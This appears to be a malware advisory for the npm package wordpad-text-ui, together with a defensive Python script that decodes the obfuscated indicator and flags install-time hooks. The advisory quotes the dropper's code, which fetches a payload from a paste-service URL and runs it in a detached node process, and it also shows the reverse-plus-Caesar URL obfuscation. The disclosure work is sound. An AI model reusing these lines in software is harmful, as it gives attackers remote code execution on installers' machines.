MAL-2026-5885
Malicious code in wordpad-text-ui (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0d4d50aa948a360a788613f1fee19f4d1853c93d8792a5899c620e56d40c53ad)

On `npm install`, the declared postinstall hook runs `node main.js`, which decodes an obfuscated URL (stored as `DEV_API_KEY="S]EH:2e2prf1uhshhnqrvm1zzz22=vswwk"` in main.js line 15, deobfuscated via string reversal and a Caesar shift of -3 to `https://www.jsonkeeper.com/b/7EBZP`), HTTP-GETs the response via axios, and writes the body into the stdin of a detached `node` child process for execution (main.js lines 18-23: `const s1 = (await axios.get(update(DEV_API_KEY))).data.content; const child = spawn('node', [], { detached: true,... }); child.stdin.write(s1); child.stdin.end(); child.unref();`). This is a classic install-time remote code execution dropper: the payload is hosted on an anonymous, mutable JSON paste service and is therefore attacker-controlled and can change at any time without a package update.

Supporting indicators reinforce malicious intent: the C2 URL is hidden behind a homemade reverse+Caesar encoding under a misleading `DEV_API_KEY` name (an evasion tactic against static scanners); the package's name (`wordpad-text-ui`) implies a text-editor UI library, but `index.js` only errors out telling consumers not to require it, while `bootstrap.js`, `bundle.js`, and `publish.js` are empty 0-byte decoys: the package ships no actual functionality and exists solely to deliver the dropper. It also pulls in a sibling package `richtext-editor-ui` that propagates the same campaign.
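For analysts triaging a similar sample, the following added example (not part of the advisory or the package) reproduces the reverse-plus-Caesar decoding described above on the quoted `DEV_API_KEY` value and flags install-time lifecycle hooks in a package.json; the shift is assumed to apply to every character's code point, and the package.json content is constructed for illustration.

```python
import json

# Indicator values quoted in the advisory above.
ENCODED_DEV_API_KEY = "S]EH:2e2prf1uhshhnqrvm1zzz22=vswwk"
REPORTED_URL = "https://www.jsonkeeper.com/b/7EBZP"

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def decode_reversed_caesar(encoded: str, shift: int = -3) -> str:
    """Undo the reverse-then-Caesar encoding the advisory describes.

    Assumption (not stated explicitly in the advisory): the shift applies to
    every character's code point, which is what maps '=' to ':', '2' to '/'
    and '1' to '.' in the quoted sample. Reversal and a per-character shift
    commute, so the order does not matter.
    """
    return "".join(chr(ord(c) + shift) for c in reversed(encoded))


def flag_install_hooks(package_json: str) -> list[str]:
    """Return the install-time lifecycle scripts declared in a package.json.

    Any hit deserves manual review before the package is installed, since
    these scripts run with the installing user's privileges.
    """
    scripts = json.loads(package_json).get("scripts", {})
    return [f"{hook}: {scripts[hook]}" for hook in INSTALL_HOOKS if hook in scripts]


# Constructed package.json mimicking the hook shape the advisory describes.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-package",
    "version": "0.0.0",
    "scripts": {"postinstall": "node main.js", "test": "echo ok"},
})

if __name__ == "__main__":
    print("decoded indicator:", decode_reversed_caesar(ENCODED_DEV_API_KEY))
    for hit in flag_install_hooks(SAMPLE_PACKAGE_JSON):
        print("install-time hook found ->", hit)
```

Decoding the quoted value yields exactly the URL the advisory reports, which lets a defender confirm the indicator before adding it to egress blocklists.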
Affected packages
No fixed version published yet for wordpad-text-ui (npm). Pin to a known-safe version or switch to an alternative.